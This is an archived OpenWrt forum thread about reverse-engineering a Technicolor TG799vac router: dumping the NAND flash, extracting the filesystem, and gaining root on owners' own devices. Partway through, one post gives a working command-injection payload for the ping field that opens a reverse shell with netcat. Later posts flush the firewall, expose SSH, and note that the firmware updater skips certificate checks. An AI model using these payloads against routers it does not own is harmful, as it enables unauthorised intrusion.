OpenWrt Forum Archive

Topic: Technicolor TG799vac Dumping Nand Flash ?

The content of this topic has been archived on 23 Apr 2018. There are no obvious gaps in this topic, but there may still be some posts missing at the end.

Ok so I have been trying to dump the contents of a Technicolor TG799vac.

So far I have removed the flash chip and read out the chip using the DumpFlash.py utility
and used binwalk to locate the Squashfs File system

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
31764480      0x1E4B000       JFFS2 filesystem, big endian
32013764      0x1E87DC4       JFFS2 filesystem, big endian
32058060      0x1E92ACC       JFFS2 filesystem, big endian
32135644      0x1EA59DC       JFFS2 filesystem, big endian
32155244      0x1EAA66C       JFFS2 filesystem, big endian
32162562      0x1EAC302       LZMA compressed data, properties: 0x5D, dictionary size: 16777216 bytes, missing uncompressed size
32162620      0x1EAC33C       LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, missing uncompressed size
32169984      0x1EAE000       JFFS2 filesystem, big endian
32212480      0x1EB8600       JFFS2 filesystem, big endian
32242272      0x1EBFA60       JFFS2 filesystem, big endian
34603034      0x210001A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes
36765696      0x2310000       Squashfs filesystem, little endian, version 4.0, compression:lzma (non-standard type definition), size: 14928222 bytes,  3253 inodes, blocksize: 262144 bytes, created: Tue Jun 28 13:08:22 2016
51709334      0x3150596       xz compressed data
51855814      0x31741C6       xz compressed data
51922474      0x318462A       xz compressed data
52004354      0x3198602       xz compressed data
52046150      0x31A2946       xz compressed data
52047662      0x31A2F2E       xz compressed data
52091472      0x31ADA50       xz compressed data
52093306      0x31AE17A       xz compressed data
52095388      0x31AE99C       xz compressed data
52097286      0x31AF106       xz compressed data
52099504      0x31AF9B0       xz compressed data
52101750      0x31B0276       xz compressed data
52103748      0x31B0A44       xz compressed data
52106574      0x31B154E       xz compressed data
52108628      0x31B1D54       xz compressed data
52110506      0x31B24AA       xz compressed data
52112416      0x31B2C20       xz compressed data
52114650      0x31B34DA       xz compressed data
52116652      0x31B3CAC       xz compressed data
52118514      0x31B43F2       xz compressed data
52118772      0x31B44F4       xz compressed data
52122718      0x31B545E       xz compressed data
52126772      0x31B6434       xz compressed data
52131218      0x31B7592       xz compressed data
52135620      0x31B86C4       xz compressed data
52138550      0x31B9236       xz compressed data
52141480      0x31B9DA8       xz compressed data
52144930      0x31BAB22       xz compressed data
52148772      0x31BBA24       xz compressed data
52152506      0x31BC8BA       xz compressed data
52153220      0x31BCB84       xz compressed data
52153882      0x31BCE1A       xz compressed data
52155856      0x31BD5D0       xz compressed data
52157758      0x31BDD3E       xz compressed data
52159824      0x31BE550       xz compressed data
137736218     0x835B01A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes

Used dd to extract the Image

$ dd  if=Modem.img bs=1 skip=36765696 count=14928222 of=Modem.squashfs
14928222+0 records in
14928222+0 records out
14928222 bytes (15 MB) copied, 22.0777 s, 676 kB/s

Tried to unsuqashfs the image.

$ unsquashfs -s Modem.squashfs                                                                                                                                                                                 
Found a valid SQUASHFS 4:0 superblock on Modem.squashfs.                                                                                                                                                                                   
Creation or last append time Tue Jun 28 13:08:22 2016                                                                                                                                                                                  
Filesystem size 14578.34 Kbytes (14.24
Mbytes)                                                                                                                                                                            
Compression xz                                                                                                                                                                                      
xz: error reading stored compressor options from filesystem!                                                                                                                                                                         
Block size
262144                                                                                                                                                                              
Filesystem is exportable via NFS                                                                                                                                                                                   
Inodes are compressed                                                                                                                                                                      
Data is compressed                                                                                                                                                                      
Fragments are compressed                                                                                                                                                                      
Always-use-fragments option is not specified                                                                                                                                                                            
Xattrs are not stored                                                                                                                                                                              
Duplicates are Removed                                                                                                                                                                            
Number of fragments 85                                                                                                                                                                                      
Number of inodes 3253                                                                                                                                                                                 
Number of ids 1

$ unsquashfs -d squash-root1  Modem.squashfs
Parallel unsquashfs: Using 4 processors                                                                                                                                                                       
Lseek failed because Invalid argument                                                                                                                                                                           
read_block: failed to read block @0x71eed2525ee8f30e                                                                                                                                                   
read_uids_guids: failed to read id table block                                                                                                                                                                                  
FATAL ERROR:failed to uid/gid table

But that failed
So next i tried to extract with firmware-mod-kit

$ ./unsquashfs_all.sh ~/projects/Telstra/DumpFlash/Modem.squashfs ~/projects/Telstra/DumpFlash/Squashfs/
Traceback (most recent call last):
  File "./src/binwalk-1.0/src/bin/binwalk-script", line 5, in <module>
    import binwalk
  File "/home/Matthew/projects/Telstra/FMK/src/binwalk-1.0/src/bin/binwalk/__init__.py", line 2, in <module>
    import magic
ImportError: No module named magic
Attempting to extract SquashFS .X file system...


Trying ./src/squashfs-2.1-r2/unsquashfs-lzma... 
Trying ./src/squashfs-2.1-r2/unsquashfs... 
Trying ./src/squashfs-3.0/unsquashfs-lzma... 
Trying ./src/squashfs-3.0/unsquashfs... 
Trying ./src/squashfs-3.0-lzma-damn-small-variant/unsquashfs-lzma... 
Trying ./src/others/squashfs-2.0-nb4/unsquashfs... 
Trying ./src/others/squashfs-3.0-e2100/unsquashfs-lzma... 
Trying ./src/others/squashfs-3.0-e2100/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-lzma/squashfs3.2-r2/squashfs-tools/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-hg612-lzma/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-wnr1000/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-rtn12/unsquashfs... 
Trying ./src/others/squashfs-3.3/unsquashfs... 
Trying ./src/others/squashfs-3.3-lzma/squashfs3.3/squashfs-tools/unsquashfs... 
Trying ./src/others/squashfs-3.3-grml-lzma/squashfs3.3/squashfs-tools/unsquashfs... 
Trying ./src/others/squashfs-3.4-cisco/unsquashfs... 
Trying ./src/others/squashfs-3.4-nb4/unsquashfs-lzma... 
Trying ./src/others/squashfs-3.4-nb4/unsquashfs... 
Trying ./src/others/squashfs-4.2-official/unsquashfs... Parallel unsquashfs: Using 4 processors

Trying ./src/others/squashfs-4.2/unsquashfs... Parallel unsquashfs: Using 4 processors

Trying ./src/others/squashfs-4.0-lzma/unsquashfs-lzma... Parallel unsquashfs: Using 4 processors

Trying ./src/others/squashfs-4.0-realtek/unsquashfs... Skipping others/squashfs-hg55x-bin (wrong version)...
File extraction failed!

But still no joy :-(

Can anyone offer any advice or maybe point out any mistakes as i am new to this all and still learning any tips or pointers would be a Great help

Thanks.

Ok I managed to get it to extract.... Yay

As it turns out when I did the NAND dump I also dumped the OOB part of the NAND.
So I had to run it through Jean-Michel Picods Nand-dump-tool.py program to separate out the OOB area.

$ python Nand-dump-tool.py -i ModemRaw.img -o Split_seperate.img -I 01f1801d --layout separate

[*] Using given ID code ID code : 01f1801d
Manufacturer : AMD / Spansion
Device : NAND 128MiB 3,3V 8-bit
Die/Package : 1
Cell type : 2 Level Cell
Simultaneously programmed paged : 1
Interleave between multiple chips: False
Write cache : True
Page size : 2048 bytes (2 K)
Spare area size : 16 bytes / 512 byte
Block size : 131072 bytes (128 K)
Organization : X16
Serial access time : 29 ns
OOB size : 64 bytes

[] Start dumping...
[] Finished

Total: 138412032 bytes (132.00 MB)
Data : 134217728 bytes (128.00 MB)
OOB : 4194304 bytes (4.00 MB)
Clear: 86.69% of the flash is empty (56813 pages out of 65536)

Once that was done running it through binwalk again gave me a much more sensible output and a extracted File System...

$ binwalk Split_seperate.img 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
38284         0x958C          SHA256 hash constants, big endian
30801920      0x1D60000       JFFS2 filesystem, big endian
33554458      0x200001A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes
35651584      0x2200000       Squashfs filesystem, little endian, version 4.0, compression:xz, size: 14928222 bytes, 3253 inodes, blocksize: 262144 bytes, created: 2016-06-28 03:08:22
133076364     0x7EE958C       SHA256 hash constants, big endian
133562394     0x7F6001A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes

I am also interested in looking at hacking this modem, considering how good the hardware is and readily available they are here in oz.

I was just wondering if you'd be able to post a copy of the dump? Would be interested in having a look at the filesystem's contents.

Here is a link to the root-fs I extracted https://drive.google.com/open?id=0B7ln9 … WEtX1Z4Rnc
Hopefully the link works.

I have had a slight break from trying to crack this modem but I have ordered a TSOP 48 Socket so I can modify the firmware directly and not have to unsolder and resolder the chip every time.

Hopefully this will yield some results this time around.

Any progress on getting OpenWRT to run ? Would love to open this router up.

I too am watching this, (Just signed up), Telstra NBN FTTN, Australia.

I do like the approach though, Cannot Jtag it, so just desolder the chip and dump it smile

Not much luck yet. I have pretty much hit a wall with this at the moment as with the setup I  am using I cannot seem to rewrite the modified firmware back to the flash chip, and i don't have any more routers so keep testing with.

Any help would be appreciated.
I have been using ohjeongwooks DumpFlash program to dump and then try to rewrite the flash chip but  it will only write a few blocks then fails. https://github.com/ohjeongwook/DumpFlash/issues/10

Not sure what to try next now?

Hi Path-E, I have a spare 799vac lying around. Do you want it to continue your work ?

Does anyone have a copy of the firmware or binary? I'd like to try to boot-p flash it.
Cheers!

Unfortunately the firmware files are not publicly available as Telstra automatically pushes the firmware updates.

Just wondering if you managed to get anywhere with this as yet?

Thank you very much CRC.

That post helped a great deal, and now I have Root.

After exploiting the "LAN-side: Command injection in ping" vulnerabilities I was able to re enable the serial console by.

 $ mount -o remount,rw / 

Then modifying the /etc/inittab file by changing

::sysinit:/etc/init.d/rcS S boot
::shutdown:/etc/init.d/rcS K shutdown
#ttyS0::askfirst:/bin/login

to

::sysinit:/etc/init.d/rcS S boot
::shutdown:/etc/init.d/rcS K shutdown
ttyS0::askfirst:/bin/login

BOOM permanent root access.

It appears that article has been removed.
Archived version here >>> https://web.archive.org/web/20170715063 … -gateways/

All that is required is to first start a Ncat listener

nc -lvvp 10001

Go to the "Diagnostics Ping/Trace" section in the routers web interface and in the "Ip Address field" put 

:::::::;nc [IP Address of remote machine] 10001 -e /bin/sh

e.g

:::::::;nc 10.0.0.86 10001 -e /bin/sh

Then "Send Ping Request".
Just make sure that you have port 10001 open in your firewall to allow the connection.

Any chance you could do a dump of the dmesg, and anything else you can find via mtd etc?

Ok, so I figured I'd factory reset mine and try this....

Managed to get a shell, then ran:

mount -o rw,remount /
echo "iptables -F" > /etc/rc.local
echo "dropbear &" >> /etc/rc.local
passwd (set a new root password here)

Then put the device back into bridge mode via the web interface and all is good.

I now wonder what it'd take to get openwrt or lede on there seeing as there's a working sysupgrade binary wink

In other interesting news, I changed the network config in /etc/config/network to this:

config interface 'lan'
        option type 'bridge'
        option proto 'static'
        option netmask '255.255.255.0'
        option ip6hint '0'
        option ip6assign '64'
        option ipaddr '10.1.1.253'
        option force_link '0'
        list ifname 'eth0'
        list ifname 'eth1'
        list ifname 'eth2'
        list ifname 'wl0'
        list ifname 'wl0_1'
        list ifname 'wl1'
        list ifname 'wl1_1'

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

Now I can run the device in bridge mode, and connect my real router to the port closest to the WAN port (using eth4 doesn't work) and it separates my PPPoE out to the ISP and the bridge between my LAN and wifi.

Happy day smile

If you run

strings /etc/cwmpd.db 

there are  URLs for firmware that can be downloaded.
Also it may be possible for someone with enough time on their hands to roll their own firmware updates? Or at least peek into new ones to find new ways in?

Well, I've had some progress....

I've managed to unlock all the 'tiles' in the device even in bridge mode - Change /www/lua/cards_limiter.lua to:

function M.card_limited(info, cardname)
  ## Display all cards.
  return false

  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end

I've also managed to get 2 SIP lines registered and handling calls - although I can't currently get the FXS ports to give a dialtone or anything similar....

That part has me kinda stumped.

The file /rom/usr/lib/cwmpd/transfers/switchover.sh is somewhat interesting... This seems to switch banks in the firmware that gives you a 'preview firmware'. You can run this script again to switch back to your previous image.

When I log in via SSH on this other bank, I get a lovely message saying:

Demo build, unofficial Technicolor SW, not suitable for deployment!

This is on firmware version:

Product: vant-f_telstra_r15-3
Release: Turquoise (15.3)
Version: 15.53.6886-1549011-20160607014710-bc692af66b59291ecba274f6fa4564fb0d8d2a7b

When I switch back to the other bank, I get:

Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d

Seems like a *VERY* interesting recovery method.

As far as firmware, it all comes from:
https://tg799.technicolor.cwmp.bdms.telstra.net/

Interestingly enough - this option is set:

option ssl_verifypeer '0'

This means it doesn't validate the SSL cert - meaning you can MITM it as well. The Telstra server requires an SSL Client cert to let you in, but of course that's on the device (in /etc/ssl/ smile)

Oh, this is cool! I've been lurking this thread for a while now! Thanks for the information! smile

(Last edited by Cadavrez on 3 Sep 2017, 05:14)

We have this one in Sweden as well, with a slightly different configuration.

root@dsldevice:/bin# cat /etc/banner 
-----------------------------------------------------------------------       
                        ##
                   #########
                 ###########
                #########
               ####                      ##
              ##          ##             ##
      ###########        #####   ####    ##    ####    ## ###     ####    ## ##
   ########   #####       ##   ##    ##  ##  ##    ##  #######  ##    ##  #####
  ########    #######     ##   ##    ##  ##  ##    ##  ##   ##  ##    ##  ###
########      ########    ##   ########  ##  ########  ##   ##  ##    ##  ##
#######        ########   ##   ##        ##  ##        ##   ##  ##    ##  ##
######         #########  ####  ######   ###  ######   ##   ##    ####    ##
  ##            #########
                ######### 
                 ########
                  ####### 
                   #####
-----------------------------------------------------------------------       

Product: vant-w_telenor_r15-4
Release: Crimson (15.4)
Version: 15.53.7451-1761003-20170320115330-9ec66df57f42235f841c0a8657dca23b9dd92fc0


Hash config:         9ec66df57f42235f841c0a8657dca23b9dd92fc0
Hash openwrt:        6009539cb0b11fc3b0ee0b9b9f048f4a84990108
Hash kernel:         d342b8a0f37a4cefc64188a2cd7c8a16694255f4
Hash lte:            cfb1f999e1196e5d1a139d6f298f233a463d5b1a
Hash packages:       e141b58a0befd05b143711f6c249f7cd8dc4278e
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash custo:          11b213d6890920cbe4e81fc0bc2bd0ac6e11224f
Hash technicolor:    1a0949c6c363793f48523d2589e3962051d9f0f8

The Telenor/BBB (Bredbandsbolaget) version is already running dropbear by default, as some sort of backdoor entrance for them to ssh in and fix issues. Dropbear is only set up to listen on the WAN port and only allows certain IP's + subnets to connect.

So to fix this you need to change to dropbear configuration (/etc/config/dropbear) to the following during the hack:

config dropbear
    option PasswordAuth 'on'
    option RootPasswordAuth 'on'
    option Port '22'
    option Interface 'wan'
    option Interface 'lan'

Then run "iptables -A INPUT -p tcp --dport ssh -j ACCEPT"

If you want a firmware dump of this version I'll gladly share. smile

Awesome. Let me know if any of the stuff I've documented is different for you - or if you find out further that I can add to it.

While we might not get OpenWRT / LEDE on there - I'm quite happy with the firmware as it is with the extra control. I just wished Technicolor made a 'generic' firmware that didn't require everything to be reverse engineered...

Maybe this could be of some use?
github[dot]com/linusw/linux-technicolor-tg784n-dant-u

It contains patches for the BCM963138 which is in this Technicolor device.

Be careful with what you do on your device, I managed to brick mine but manage to force a hard reset to get it running again. I got lucky this time!